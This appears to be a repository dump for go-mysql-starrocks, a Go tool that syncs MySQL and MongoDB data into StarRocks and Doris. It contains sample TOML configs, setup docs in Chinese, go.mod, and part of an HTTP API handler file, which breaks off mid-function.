-------------------------------------------------------------------------------- /configs/mongo-to-starrocks-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mongo2starrocks" 3 | 4 | [input] 5 | type = "mongo" 6 | # 指定初次监听开始时间点,当_xxx-pos.info点位文件内容存在时,此选项不生效 7 | start-position = "2023-03-27T11:00:00" 8 | 9 | [input.config.source] 10 | uri = "192.168.0.1:3717,192.168.0.2:3717,192.168.0.3:3717/admin?replicaSet=mgset-xxxxx" 11 | username = "root" 12 | password = "" 13 | 14 | [[filter]] 15 | # 转换document Field从camelCase到snakeCase,默认false;例如 userName(mongo) -> user_name(starrocks) 16 | type = "convert-snakecase-column" # only for mongo source 17 | [filter.config] 18 | 19 | [[filter]] 20 | type = "rename-dml-column" 21 | [filter.config] 22 | match-schema = "mongo_test" 23 | match-table = "coll1" 24 | columns = ["_id", "type"] 25 | rename-as = ["id", "type2"] 26 | 27 | [sync-param] 28 | # 同步chan队列最大值,达到会进行flush,最小100 29 | channel-size = 10240 30 | # 同步延迟秒数,达到会进行flush,最小1 31 | flush-delay-second = 10 32 | 33 | [output] 34 | type = "starrocks" 35 | 36 | [output.config.target] 37 | host = "127.0.0.1" 38 | port = 9030 39 | load-port = 8040 # support fe httpPort:8030 or be httpPort:8040 40 | username = "root" 41 | password = "" 42 | 43 | [[output.config.rule]] 44 | source-schema = "mongo_test" 
45 | source-table = "coll1" 46 | target-schema = "starrocks_test" 47 | target-table = "coll1" 48 | 49 | [[output.config.rule]] 50 | source-schema = "mongo_test" 51 | source-table = "coll2" 52 | target-schema = "starrocks_test" 53 | target-table = "coll2" -------------------------------------------------------------------------------- /configs/mysql-to-doris-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mysql2doris" 3 | 4 | [input] 5 | type = "mysql" 6 | # 指定初次监听开始的gtid点位,当_xxx-pos.info点位文件内容存在时,此选项不生效 7 | # start-gtid = "3ba13781-44eb-2157-88a5-0dc879ec2221:1-123456" 8 | 9 | [input.config.source] 10 | host = "127.0.0.1" 11 | port = 3306 12 | username = "root" 13 | password = "" 14 | 15 | # 可选的: 16 | # meta信息(_go_mysql_sr)保存的mysql地址,不配置和source保持一致 17 | # 用于source和meta分离,方便source配置从库数据源 18 | #[input.config.meta] 19 | #host = "127.0.0.1" 20 | #port = 3308 21 | #username = "root" 22 | #password = "root" 23 | 24 | [sync-param] 25 | # 同步chan队列最大值,达到会进行flush,最小100 26 | channel-size = 10240 27 | # 同步延迟秒数,达到会进行flush,最小1 28 | flush-delay-second = 10 29 | 30 | #[[filter]] 31 | #type = "delete-dml-column" # 过滤列 32 | #[filter.config] 33 | #match-schema = "mysql_test" 34 | #match-table = "tb1" 35 | #columns = ["phone"] 36 | 37 | #[[filter]] 38 | #type = "rename-dml-column" 39 | #[filter.config] 40 | #match-schema = "mysql_test" 41 | #match-table = "tb1" 42 | #columns = ["col_1", "col_2"] 43 | #rename-as = ["col_11", "col_22"] 44 | 45 | [output] 46 | type = "doris" 47 | 48 | [output.config.target] 49 | host = "127.0.0.1" 50 | port = 9030 51 | load-port = 8040 # support fe httpPort:8030 or be httpPort:8040 52 | username = "root" 53 | password = "" 54 | 55 | [[output.config.rule]] 56 | source-schema = "mysql_test" 57 | source-table = "tb1" 58 | target-schema = "doris_test" 59 | target-table = "tb1" 60 | 61 | [[output.config.rule]] 62 | source-schema = "mysql_test" 63 | source-table = "tb2" 64 | 
target-schema = "doris_test" 65 | target-table = "tb2" -------------------------------------------------------------------------------- /configs/mysql-to-starrocks-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mysql2starrocks" 3 | 4 | [input] 5 | type = "mysql" 6 | # 指定初次监听开始的gtid点位,当_xxx-pos.info点位文件内容存在时,此选项不生效 7 | # start-gtid = "3ba13781-44eb-2157-88a5-0dc879ec2221:1-123456" 8 | 9 | [input.config.source] 10 | host = "127.0.0.1" 11 | port = 3306 12 | username = "root" 13 | password = "" 14 | 15 | # 可选的: 16 | # meta信息(_go_mysql_sr)保存的mysql地址,不配置和source保持一致 17 | # 用于source和meta分离,方便source配置从库数据源 18 | #[input.config.meta] 19 | #host = "127.0.0.1" 20 | #port = 3308 21 | #username = "root" 22 | #password = "root" 23 | 24 | [sync-param] 25 | # 同步chan队列最大值,达到会进行flush,最小100 26 | channel-size = 10240 27 | # 同步延迟秒数,达到会进行flush,最小1 28 | flush-delay-second = 10 29 | 30 | #[[filter]] 31 | #type = "delete-dml-column" # 过滤列 32 | #[filter.config] 33 | #match-schema = "mysql_test" 34 | #match-table = "tb1" 35 | #columns = ["phone"] 36 | 37 | #[[filter]] 38 | #type = "convert-dml-column" # 转换dml行字段类型为json,column varchar(mysql) -> column json(starrocks) 39 | #[filter.config] 40 | #match-schema = "mysql_test" 41 | #match-table = "tb1" 42 | #columns = ["varchar_json_column", "varchar_arrayjson_column"] 43 | #cast-as = ["json", "arrayJson"] # json示例: {"id": 1, "name": 'zhangsan'}, arrayJson示例: [{"id": 1, "name": 'zhangsan'}, {"id": 1, "name": 'lisi'}] 44 | 45 | #[[filter]] 46 | #type = "rename-dml-column" 47 | #[filter.config] 48 | #match-schema = "mysql_test" 49 | #match-table = "tb1" 50 | #columns = ["col_1", "col_2"] 51 | #rename-as = ["col_11", "col_22"] 52 | 53 | [output] 54 | type = "starrocks" 55 | 56 | [output.config.target] 57 | host = "127.0.0.1" 58 | port = 9030 59 | load-port = 8040 # support fe httpPort:8030 or be httpPort:8040 60 | username = "root" 61 | password = "" 62 | 63 | 
[[output.config.rule]] 64 | source-schema = "mysql_test" 65 | source-table = "tb1" 66 | target-schema = "starrocks_test" 67 | target-table = "tb1" 68 | 69 | [[output.config.rule]] 70 | source-schema = "mysql_test" 71 | source-table = "tb2" 72 | target-schema = "starrocks_test" 73 | target-table = "tb2" -------------------------------------------------------------------------------- /configs/sample_for_v0.1.x_0.2.0/mongo-to-starrocks-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mongo2starrocks" 3 | 4 | [input] 5 | # 指定初次监听开始时间点,当_xxx-pos.info点位文件内容存在时,此选项不生效 6 | start-position = 2023-03-27T11:00:00 # Without double quotes, it means the local time zone 7 | # 转换document Field从camelCase到snakeCase,默认false;例如 userName(mongo) -> user_name(starrocks) 8 | # 设置为true,还会处理主键Field命名:_id(mongo) -> id(starrocks) 9 | convert-snake-case = false 10 | 11 | [mongo] 12 | uri = "192.168.0.1:3717,192.168.0.2:3717,192.168.0.3:3717/admin?replicaSet=mgset-xxxxx" 13 | username = "root" 14 | password = "" 15 | 16 | [starrocks] 17 | host = "127.0.0.1" 18 | port = 8040 19 | username = "root" 20 | password = "" 21 | 22 | [sync-param] 23 | # 同步chan队列最大值,达到会进行flush,最小100 24 | channel-size = 10240 25 | # 同步延迟秒数,达到会进行flush,最小1 26 | flush-delay-second = 10 27 | 28 | [[rule]] 29 | source-schema = "mongo_test" 30 | source-table = "coll1" 31 | target-schema = "starrocks_test" 32 | target-table = "coll1" 33 | 34 | [[rule]] 35 | source-schema = "mongo_test" 36 | source-table = "coll2" 37 | target-schema = "starrocks_test" 38 | target-table = "coll2" -------------------------------------------------------------------------------- /configs/sample_for_v0.1.x_0.2.0/mysql-to-starrocks-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mysql2starrocks" 3 | 4 | [input] 5 | # 指定初次监听开始的gtid点位,当_xxx-pos.info点位文件内容存在时,此选项不生效 6 | # start-gtid = 
"3ba13781-44eb-2157-88a5-0dc879ec2221:1-123456" 7 | 8 | [mysql] 9 | host = "127.0.0.1" 10 | port = 3306 11 | username = "root" 12 | password = "" 13 | 14 | [starrocks] 15 | host = "127.0.0.1" 16 | port = 8040 17 | username = "root" 18 | password = "" 19 | 20 | [sync-param] 21 | # 同步chan队列最大值,达到会进行flush,最小100 22 | channel-size = 10240 23 | # 同步延迟秒数,达到会进行flush,最小1 24 | flush-delay-second = 10 25 | 26 | #[[filter]] 27 | #type = "delete-dml-column" # 过滤列 28 | #[filter.config] 29 | #match-schema = "mysql_test" 30 | #match-table = "tb1" 31 | #columns = ["phone"] 32 | 33 | #[[filter]] 34 | #type = "convert-dml-column" # 转换dml行字段类型为json,column varchar(mysql) -> column json(starrocks) 35 | #[filter.config] 36 | #match-schema = "test" 37 | #match-table = "tb1" 38 | #columns = ["varchar_json_column", "varchar_arrayjson_column"] 39 | #cast-as = ["json", "arrayJson"] # json示例: {"id": 1, "name": 'zhangsan'}, arrayJson示例: [{"id": 1, "name": 'zhangsan'}, {"id": 1, "name": 'lisi'}] 40 | 41 | [[rule]] 42 | source-schema = "mysql_test" 43 | source-table = "tb1" 44 | target-schema = "starrocks_test" 45 | target-table = "tb1" 46 | 47 | [[rule]] 48 | source-schema = "mysql_test" 49 | source-table = "tb2" 50 | target-schema = "starrocks_test" 51 | target-table = "tb2" -------------------------------------------------------------------------------- /docs/docker run.md: -------------------------------------------------------------------------------- 1 | ### 使用Dockerfile构建 2 | 3 | #### 1. git clone 4 | ```shell 5 | [sr@ ~]$ git clone https://github.com/fatalclarine/go-mysql-starrocks.git 6 | ``` 7 | #### 2. docker build 8 | ```shell 9 | [sr@ ~]$ cd go-mysql-starrocks 10 | [sr@ ~]$ docker build --no-cache --tag go-mysql-sr . 11 | ``` 12 | #### 3. docker中使用本地配置文件,编辑配置文件starrocks.toml 13 | ```shell 14 | [sr@ ~]$ cd configs 15 | [sr@ ~]$ mkdir go-mysql-sr 16 | [sr@ ~]$ cp mysql-to-starrocks-sample.toml go-mysql-sr/starrocks.toml 17 | [sr@ ~]$ vim go-mysql-sr/starrocks.toml 18 | ``` 19 | #### 4. 
docker run start,替换${path}为本地配置文件绝对路径 20 | ```shell 21 | [sr@ ~]$ docker run -itd -p 6166:6166 --name go-mysql-sr -v ${path}/go-mysql-starrocks/configs/go-mysql-sr/:/etc/go-mysql-sr/ go-mysql-sr 22 | ``` -------------------------------------------------------------------------------- /docs/img/grafana.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fatalclarine/go-mysql-starrocks/4440b72475d33c4bb8fa3b0a36c439d2cb5a14e6/docs/img/grafana.png -------------------------------------------------------------------------------- /docs/mongo sync for_v0.1.x_0.2.0.md: -------------------------------------------------------------------------------- 1 | ## mongo 同步到 starrocks 2 | 3 | ### 使用说明 4 | #### 环境准备 5 | ``` 6 | 1. GO构建版本 v1.18.10 7 | 2. mongo版本 4.2及以上;使用change stream监听方式,理论支持3.6及以上 8 | ``` 9 | #### 1. 新增配置文件 10 | mongo-to-starrocks.toml 11 | ```toml 12 | # name 必填,多实例运行时保证全局唯一 13 | name = "mongo2starrocks" 14 | 15 | [input] 16 | # 指定初次监听开始时间点,当_xxx-pos.info点位文件内容存在时,此选项不生效 17 | start-position = 2023-03-27T11:00:00 # Without double quotes, it means the local time zone 18 | # 转换document Field从camelCase到snakeCase,默认false;例如 userName(mongo) -> user_name(starrocks) 19 | # 设置为true,还会处理主键Field命名:_id(mongo) -> id(starrocks) 20 | convert-snake-case = false 21 | 22 | [mongo] 23 | uri = "192.168.0.1:3717,192.168.0.2:3717,192.168.0.3:3717/admin?replicaSet=mgset-xxxxx" 24 | username = "root" 25 | password = "" 26 | 27 | [starrocks] 28 | host = "127.0.0.1" 29 | port = 8040 30 | username = "root" 31 | password = "" 32 | 33 | [sync-param] 34 | # 同步chan队列最大值,达到会进行flush,最小100 35 | channel-size = 10240 36 | # 同步延迟秒数,达到会进行flush,最小1 37 | flush-delay-second = 10 38 | 39 | [[rule]] 40 | source-schema = "mongo_test" 41 | source-table = "coll1" 42 | target-schema = "starrocks_test" 43 | target-table = "coll1" 44 | 45 | [[rule]] 46 | source-schema = "mongo_test" 47 | source-table = "coll2" 48 | target-schema = 
"starrocks_test" 49 | target-table = "coll2" 50 | ``` 51 | #### 2. 启动 52 | ```shell 53 | [sr@ ~]$ ./go-mongo-starrocks-linux-xxxxxx -config mongo-to-starrocks.toml 54 | ``` 55 | #### 3. 查看日志 56 | 默认输出到控制台 57 | 58 | 指定log-file参数运行 59 | ```shell 60 | [sr@ ~]$ ./go-mongo-starrocks-linux-xxxxxx -config mongo-to-starrocks.toml -log-file mongo2starrocks.log 61 | [sr@ ~]$ tail -f mongo2starrocks.log 62 | ``` 63 | 64 | #### 4. 查看帮助 65 | ```shell 66 | [sr@ ~]$ ./go-mongo-starrocks-linux-xxxxxx -h 67 | ``` 68 | #### 5. 后台运行 69 | ```shell 70 | [sr@ ~]$ (nohup ./go-mongo-starrocks-linux-xxxxxx -config mongo-to-starrocks.toml -log-file mongo2starrocks.log -level info &) 71 | ``` 72 | -------------------------------------------------------------------------------- /docs/mongo sync.md: -------------------------------------------------------------------------------- 1 | ## mongo 同步到 starrocks 2 | 3 | ### 使用说明 4 | #### 环境准备 5 | ``` 6 | 1. GO构建版本 v1.18.10 7 | 2. mongo版本 4.2及以上;使用change stream监听方式,理论支持3.6及以上 8 | ``` 9 | #### 1. 
新增配置文件 10 | mongo-to-starrocks.toml 11 | ```toml 12 | # name 必填,多实例运行时保证全局唯一 13 | name = "mongo2starrocks" 14 | 15 | [input] 16 | type = "mongo" 17 | # 指定初次监听开始时间点,当_xxx-pos.info点位文件内容存在时,此选项不生效 18 | start-position = "2023-03-27 11:00:00" 19 | 20 | [input.config.source] 21 | uri = "192.168.0.1:3717,192.168.0.2:3717,192.168.0.3:3717/admin?replicaSet=mgset-xxxxx" 22 | username = "root" 23 | password = "" 24 | 25 | [[filter]] 26 | # 转换document Field从camelCase到snakeCase,默认false;例如 userName(mongo) -> user_name(starrocks) 27 | type = "convert-snakecase-column" # only for mongo source 28 | [filter.config] 29 | 30 | [[filter]] 31 | type = "rename-dml-column" 32 | [filter.config] 33 | match-schema = "mongo_test" 34 | match-table = "coll1" 35 | columns = ["_id", "type"] 36 | rename-as = ["id", "type2"] 37 | 38 | [sync-param] 39 | # 同步chan队列最大值,达到会进行flush,最小100 40 | channel-size = 10240 41 | # 同步延迟秒数,达到会进行flush,最小1 42 | flush-delay-second = 10 43 | 44 | [output] 45 | type = "starrocks" 46 | 47 | [output.config.target] 48 | host = "127.0.0.1" 49 | port = 9030 50 | load-port = 8040 51 | username = "root" 52 | password = "" 53 | 54 | [[output.config.rule]] 55 | source-schema = "mongo_test" 56 | source-table = "coll1" 57 | target-schema = "starrocks_test" 58 | target-table = "coll1" 59 | 60 | [[output.config.rule]] 61 | source-schema = "mongo_test" 62 | source-table = "coll2" 63 | target-schema = "starrocks_test" 64 | target-table = "coll2" 65 | ``` 66 | #### 2. 启动 67 | ```shell 68 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -config mongo-to-starrocks.toml 69 | ``` 70 | #### 3. 查看日志 71 | 默认输出到控制台 72 | 73 | 指定log-file参数运行 74 | ```shell 75 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -config mongo-to-starrocks.toml -log-file mongo2starrocks.log 76 | [sr@ ~]$ tail -f mongo2starrocks.log 77 | ``` 78 | 79 | #### 4. 查看帮助 80 | ```shell 81 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -h 82 | ``` 83 | #### 5. 
后台运行 84 | ```shell 85 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -config mongo-to-starrocks.toml -log-file mongo2starrocks.log -level info -daemon 86 | ``` 87 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/fatalclarine/go-mysql-starrocks 2 | 3 | go 1.22 4 | 5 | toolchain go1.22.3 6 | 7 | require ( 8 | github.com/BurntSushi/toml v1.3.0 9 | github.com/dop251/goja v0.0.0-20230828202809-3dbe69dd2b8e 10 | github.com/go-demo/version v0.0.0-20200109120206-2cde9473fd92 11 | github.com/go-mysql-org/go-mysql v1.6.0 12 | github.com/iancoleman/strcase v0.2.0 13 | github.com/json-iterator/go v1.1.12 14 | github.com/juju/errors v1.0.0 15 | github.com/mitchellh/mapstructure v1.5.0 16 | github.com/pingcap/tidb/pkg/parser v0.0.0-20240608122828-5c0d73719b10 17 | github.com/prometheus/client_golang v1.15.1 18 | github.com/sevlyar/go-daemon v0.1.6 19 | github.com/siddontang/go v0.0.0-20180604090527-bdc77568d726 20 | github.com/siddontang/go-log v0.0.0-20190221022429-1e957dd83bed 21 | go.mongodb.org/mongo-driver v1.11.6 22 | ) 23 | 24 | replace github.com/go-mysql-org/go-mysql v1.6.0 => github.com/liuxinwang/go-mysql v1.6.3-enhancement 25 | 26 | require ( 27 | github.com/beorn7/perks v1.0.1 // indirect 28 | github.com/cespare/xxhash/v2 v2.2.0 // indirect 29 | github.com/cznic/mathutil v0.0.0-20181122101859-297441e03548 // indirect 30 | github.com/dlclark/regexp2 v1.7.0 // indirect 31 | github.com/go-sourcemap/sourcemap v2.1.3+incompatible // indirect 32 | github.com/go-sql-driver/mysql v1.7.2-0.20231213112541-0004702b931d // indirect 33 | github.com/golang/protobuf v1.5.3 // indirect 34 | github.com/golang/snappy v0.0.1 // indirect 35 | github.com/google/pprof v0.0.0-20230207041349-798e818bf904 // indirect 36 | github.com/google/uuid v1.3.0 // indirect 37 | github.com/kardianos/osext v0.0.0-20190222173326-2bc1f35cddc0 // indirect 38 | 
github.com/klauspost/compress v1.13.6 // indirect 39 | github.com/matttproud/golang_protobuf_extensions v1.0.4 // indirect 40 | github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect 41 | github.com/modern-go/reflect2 v1.0.2 // indirect 42 | github.com/montanaflynn/stats v0.0.0-20171201202039-1bf9dbcd8cbe // indirect 43 | github.com/pingcap/errors v0.11.5-0.20240311024730-e056997136bb // indirect 44 | github.com/pingcap/failpoint v0.0.0-20220801062533-2eaa32854a6c // indirect 45 | github.com/pingcap/log v1.1.0 // indirect 46 | github.com/pingcap/parser v0.0.0-20210415081931-48e7f467fd74 // indirect 47 | github.com/pkg/errors v0.9.1 // indirect 48 | github.com/prometheus/client_model v0.3.0 // indirect 49 | github.com/prometheus/common v0.42.0 // indirect 50 | github.com/prometheus/procfs v0.9.0 // indirect 51 | github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect 52 | github.com/rogpeppe/go-internal v1.10.0 // indirect 53 | github.com/shopspring/decimal v1.3.1 // indirect 54 | github.com/tidwall/pretty v1.2.1 // indirect 55 | github.com/xdg-go/pbkdf2 v1.0.0 // indirect 56 | github.com/xdg-go/scram v1.1.1 // indirect 57 | github.com/xdg-go/stringprep v1.0.3 // indirect 58 | github.com/youmark/pkcs8 v0.0.0-20181117223130-1be2e3e5546d // indirect 59 | go.uber.org/atomic v1.11.0 // indirect 60 | go.uber.org/multierr v1.11.0 // indirect 61 | go.uber.org/zap v1.26.0 // indirect 62 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d // indirect 63 | golang.org/x/exp v0.0.0-20240205201215-2c58cdc269a3 // indirect 64 | golang.org/x/sync v0.6.0 // indirect 65 | golang.org/x/sys v0.12.0 // indirect 66 | golang.org/x/text v0.14.0 // indirect 67 | google.golang.org/protobuf v1.30.0 // indirect 68 | gopkg.in/natefinch/lumberjack.v2 v2.2.1 // indirect 69 | ) 70 | -------------------------------------------------------------------------------- /pkg/api/api.go: 
-------------------------------------------------------------------------------- 1 | package api 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "github.com/go-mysql-org/go-mysql/client" 7 | "github.com/go-mysql-org/go-mysql/mysql" 8 | jsoniter "github.com/json-iterator/go" 9 | "github.com/juju/errors" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/input" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/output" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 16 | "github.com/siddontang/go-log/log" 17 | "io" 18 | "net/http" 19 | "regexp" 20 | "strconv" 21 | "strings" 22 | "time" 23 | ) 24 | 25 | func GetConfigHandle(conf *config.BaseConfig, oo core.Output) func(http.ResponseWriter, *http.Request) { 26 | return func(w http.ResponseWriter, r *http.Request) { 27 | marshal, err := json.Marshal(conf) 28 | if err != nil { 29 | _, err = w.Write([]byte(fmt.Sprintf("result: config to json err: %v\n", err.Error()))) 30 | if err != nil { 31 | log.Errorf("http response write err: ", err.Error()) 32 | return 33 | } 34 | return 35 | } 36 | _, err = w.Write(marshal) 37 | if err != nil { 38 | log.Errorf("http response write err: ", err.Error()) 39 | return 40 | } 41 | return 42 | } 43 | } 44 | 45 | func AddRuleHandle(ip core.Input, oo core.Output, schema core.Schema) func(http.ResponseWriter, *http.Request) { 46 | return func(w http.ResponseWriter, r *http.Request) { 47 | // read input param 48 | var addRuleMap = make(map[string]interface{}, 1) 49 | addRuleMap["RuleType"] = rule.TypeDynamicAdd 50 | data, err := io.ReadAll(r.Body) 51 | if err != nil { 52 | _, err = w.Write([]byte(fmt.Sprintf("result: add rule json data read err: %v\n", err.Error()))) 53 | if err != nil { 54 | log.Errorf("http response write err: ", err.Error()) 55 | return 56 | } 57 | return 58 | } 59 | err = 
json.Unmarshal(data, &addRuleMap) 60 | if err != nil { 61 | _, err := w.Write([]byte(fmt.Sprintf("result: rule json data to json struct err: %v\n", err.Error()))) 62 | if err != nil { 63 | log.Errorf("http response write err: ", err.Error()) 64 | return 65 | } 66 | return 67 | } 68 | 69 | isFullSync := false 70 | fullSync, ok := addRuleMap["full_sync"] 71 | if ok { 72 | switch fullSync.(type) { 73 | case bool: 74 | isFullSync, err = strconv.ParseBool(fmt.Sprintf("%v", fullSync)) 75 | if err != nil { 76 | _, err = w.Write([]byte(fmt.Sprintf("result: full_sync incorrect type failed err: %v\n", err.Error()))) 77 | if err != nil { 78 | log.Errorf("http response write err: ", err.Error()) 79 | return 80 | } 81 | return 82 | } 83 | default: 84 | _, err = w.Write([]byte(fmt.Sprintf("result: param 'full_sync' incorrect type failed\n"))) 85 | if err != nil { 86 | log.Errorf("http response write err: ", err.Error()) 87 | return 88 | } 89 | return 90 | } 91 | } 92 | 93 | // schema table add 94 | sourceSchema := fmt.Sprintf("%v", addRuleMap["source-schema"]) 95 | sourceTable := fmt.Sprintf("%v", addRuleMap["source-table"]) 96 | _, err = schema.AddTable(sourceSchema, sourceTable) 97 | if err != nil { 98 | _, err := w.Write([]byte(fmt.Sprintf("result: add rule table meta handle failed err: %v\n", err.Error()))) 99 | if err != nil { 100 | log.Errorf("http response write err: ", err.Error()) 101 | return 102 | } 103 | return 104 | } 105 | log.Infof("add schema table meta data: %v.%v", sourceSchema, sourceTable) 106 | 107 | // output rule map add 108 | err = oo.AddRule(addRuleMap) 109 | if err != nil { 110 | _, err := w.Write([]byte(fmt.Sprintf("result: add rule handle failed err: %v\n", err.Error()))) 111 | if err != nil { 112 | log.Errorf("http response write err: ", err.Error()) 113 | return 114 | } 115 | return 116 | } 117 | 118 | addRuleFmt, _ := json.Marshal(addRuleMap) 119 | log.Infof("add rule map: %v", string(addRuleFmt)) 120 | 121 | // input table regex add 122 | var reg 
*regexp.Regexp 123 | reg, err = ip.SetIncludeTableRegex(addRuleMap) 124 | if err != nil { 125 | _, err := w.Write([]byte(fmt.Sprintf("result: add rule handle failed err: %v\n", err.Error()))) 126 | if err != nil { 127 | log.Errorf("http response write err: ", err.Error()) 128 | return 129 | } 130 | return 131 | } 132 | log.Infof("add rule includeTableRegex: %v", reg.String()) 133 | log.Infof("add rule successfully") 134 | 135 | syncRows := 0 136 | if isFullSync { 137 | err = oo.Pause() 138 | log.Infof("pause output write") 139 | if err != nil { 140 | _, err = w.Write([]byte(fmt.Sprintf("result: pause err: %v\n", err.Error()))) 141 | if err != nil { 142 | log.Errorf("http response write err: ", err.Error()) 143 | return 144 | } 145 | return 146 | } 147 | 148 | // waiting handle full sync 149 | err, syncRows = FullSync(ip, oo, addRuleMap, schema) 150 | if err != nil { 151 | _, err := w.Write([]byte(fmt.Sprintf( 152 | "result: add rule full sync handle failed err: %v, full sync rows: %d\n", 153 | err.Error(), syncRows))) 154 | if err != nil { 155 | log.Errorf("http response write err: ", err.Error()) 156 | return 157 | } 158 | 159 | err = oo.Resume() 160 | if err != nil { 161 | _, err = w.Write([]byte(fmt.Sprintf("result: resume err: %v\n", err.Error()))) 162 | if err != nil { 163 | log.Errorf("http response write err: ", err.Error()) 164 | return 165 | } 166 | return 167 | } 168 | log.Infof("resume output write") 169 | 170 | return 171 | } 172 | 173 | err = oo.Resume() 174 | if err != nil { 175 | _, err = w.Write([]byte(fmt.Sprintf("result: resume err: %v\n", err.Error()))) 176 | if err != nil { 177 | log.Errorf("http response write err: ", err.Error()) 178 | return 179 | } 180 | return 181 | } 182 | log.Infof("resume output write") 183 | } 184 | 185 | // result http msg 186 | if isFullSync { 187 | _, err = w.Write([]byte(fmt.Sprintf( 188 | "result: add rule handle successfully, full sync rows: %d.\n", syncRows))) 189 | if err != nil { 190 | log.Errorf("http response 
write err: ", err.Error()) 191 | return 192 | } 193 | } else { 194 | _, err = w.Write([]byte("result: add rule handle successfully.\n")) 195 | if err != nil { 196 | log.Errorf("http response write err: ", err.Error()) 197 | return 198 | } 199 | } 200 | 201 | return 202 | } 203 | } 204 | 205 | // A DelRuleHandle for delete rule handle. 206 | func DelRuleHandle(ip core.Input, oo core.Output, schema core.Schema) func(http.ResponseWriter, *http.Request) { 207 | return func(w http.ResponseWriter, r *http.Request) { 208 | var delRule = make(map[string]interface{}, 1) 209 | data, err := io.ReadAll(r.Body) 210 | if err != nil { 211 | _, err = w.Write([]byte(fmt.Sprintf("result: delete rule json data read err: %v\n", err.Error()))) 212 | if err != nil { 213 | log.Errorf("http response write err: ", err.Error()) 214 | return 215 | } 216 | return 217 | } 218 | err = json.Unmarshal(data, &delRule) 219 | if err != nil { 220 | _, err := w.Write([]byte(fmt.Sprintf("result: rule json data to json struct err: %v\n", err.Error()))) 221 | if err != nil { 222 | log.Errorf("http response write err: ", err.Error()) 223 | return 224 | } 225 | return 226 | } 227 | 228 | // handle delete rule 229 | var reg *regexp.Regexp 230 | reg, err = ip.RemoveIncludeTableRegex(delRule) 231 | if err != nil { 232 | _, err := w.Write([]byte(fmt.Sprintf("result: delete rule handle failed err: %v\n", err.Error()))) 233 | if err != nil { 234 | log.Errorf("http response write err: ", err.Error()) 235 | return 236 | } 237 | return 238 | } 239 | log.Infof("delete rule includeTableRegex: %v", reg.String()) 240 | 241 | err = oo.DeleteRule(delRule) 242 | if err != nil { 243 | _, err := w.Write([]byte(fmt.Sprintf("result: delete rule table meta handle failed err: %v\n", err.Error()))) 244 | if err != nil { 245 | log.Errorf("http response write err: ", err.Error()) 246 | return 247 | } 248 | return 249 | } 250 | delRuleFmt, _ := json.Marshal(delRule) 251 | log.Infof("delete rule map: %v", string(delRuleFmt)) 252 | 
253 | // schema table del 254 | sourceSchema := fmt.Sprintf("%v", delRule["source-schema"]) 255 | sourceTable := fmt.Sprintf("%v", delRule["source-table"]) 256 | err = schema.DelTable(sourceSchema, sourceTable) 257 | if err != nil { 258 | _, err := w.Write([]byte(fmt.Sprintf("result: delete rule table meta handle failed err: %v\n", err.Error()))) 259 | if err != nil { 260 | log.Errorf("http response write err: ", err.Error()) 261 | return 262 | } 263 | return 264 | } 265 | 266 | log.Infof("delete rule table meta: %v", string(delRuleFmt)) 267 | 268 | log.Infof("delete rule successfully") 269 | 270 | _, err = w.Write([]byte("result: delete rule handle successfully.\n")) 271 | if err != nil { 272 | log.Errorf("http response write err: ", err.Error()) 273 | return 274 | } 275 | return 276 | } 277 | } 278 | 279 | func GetRuleHandle(oo core.Output) func(http.ResponseWriter, *http.Request) { 280 | return func(w http.ResponseWriter, r *http.Request) { 281 | 282 | rules, err := json.Marshal(oo.GetRules()) 283 | if err != nil { 284 | _, err = w.Write([]byte(fmt.Sprintf("result: rules to json err: %v\n", err.Error()))) 285 | if err != nil { 286 | log.Errorf("http response write err: ", err.Error()) 287 | return 288 | } 289 | return 290 | } 291 | _, err = w.Write(rules) 292 | if err != nil { 293 | log.Errorf("http response write err: ", err.Error()) 294 | return 295 | } 296 | return 297 | } 298 | } 299 | 300 | func PauseHandle(oo core.Output) func(http.ResponseWriter, *http.Request) { 301 | return func(w http.ResponseWriter, r *http.Request) { 302 | 303 | err := oo.Pause() 304 | if err != nil { 305 | _, err = w.Write([]byte(fmt.Sprintf("result: pause err: %v\n", err.Error()))) 306 | if err != nil { 307 | log.Errorf("http response write err: ", err.Error()) 308 | return 309 | } 310 | return 311 | } 312 | _, err = w.Write([]byte("result: pause handle successfully.\n")) 313 | if err != nil { 314 | log.Errorf("http response write err: ", err.Error()) 315 | return 316 | } 317 | 
return 318 | } 319 | } 320 | 321 | func ResumeHandle(oo core.Output) func(http.ResponseWriter, *http.Request) { 322 | return func(w http.ResponseWriter, r *http.Request) { 323 | 324 | err := oo.Resume() 325 | if err != nil { 326 | _, err = w.Write([]byte(fmt.Sprintf("result: resume err: %v\n", err.Error()))) 327 | if err != nil { 328 | log.Errorf("http response write err: ", err.Error()) 329 | return 330 | } 331 | return 332 | } 333 | _, err = w.Write([]byte("result: resume handle successfully.\n")) 334 | if err != nil { 335 | log.Errorf("http response write err: ", err.Error()) 336 | return 337 | } 338 | return 339 | } 340 | } 341 | 342 | func FullSync(ip core.Input, oo core.Output, ruleMap map[string]interface{}, s core.Schema) (e error, fullRows int) { 343 | // handle full data sync 344 | log.Infof("start handle full data sync...") 345 | switch inputPlugin := ip.(type) { 346 | case *input.MysqlInputPlugin: 347 | 